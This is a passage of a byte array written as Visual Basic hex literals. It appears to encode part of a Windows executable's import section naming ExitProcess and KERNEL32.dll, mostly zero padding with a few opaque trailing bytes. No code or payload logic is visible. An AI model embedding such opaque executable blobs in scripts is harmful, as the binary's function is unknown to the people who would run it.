&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB3&H63&HEE&HD0&H8D&HE5&H59&H05&H2C&HA3&HE4&H50&H4C&H87&H6E&H37&H79
